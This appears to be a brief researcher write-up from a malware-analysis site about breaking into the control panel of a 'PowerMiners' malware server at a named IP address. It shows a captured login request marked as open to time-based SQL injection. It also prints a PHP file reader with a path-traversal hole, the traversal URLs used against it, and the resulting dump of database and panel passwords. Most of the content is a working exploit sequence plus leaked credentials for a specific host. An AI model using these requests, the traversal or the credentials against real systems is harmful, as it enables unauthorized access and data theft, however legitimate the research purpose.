PowerMiners Sql Injection and File Reader - Malwr

PowerMiners Sql Injection and File Reader

Date: 2020-04-12

POST / HTTP/1.1
Host: 185.234.217.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
n-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Origin: http://185.234.217.6
Connection: close
Referer: http://185.234.217.6/
Cookie: PHPSESSID=in8q4gufn0ik14jdeqvvt47au5
Upgrade-Insecure-Requests: 1

inputEmail=test&inputPassword=test

Time Based Sqli: inputEmail

File Reader

http://185.234.217.6/ps/

rd.php

  <?php
   
  if(isset($_GET['file']))
  {
  $file = $_GET['file'];
  $content = file_get_contents('logs/' . $file);
  if(strlen($content) > 0)
  echo $content;
  }

http://185.234.217.6/ps/rd.php?file=../../index.php

http://185.234.217.6/ps/rd.php?file=../../1d00rs3cyruty/$_config/settings.php

  const db_hostname = "localhost";
  const db_user = "root";
  const db_password = "ACR0N1Ssyst3maspas200rds"; 
  const db_name = "kr0nd"; 
  
  //account
  const umb_username =  "KrTn";
  const umb_password = "[email protected][email protected]";

http://185.234.217.6/1d00rs3cyruty/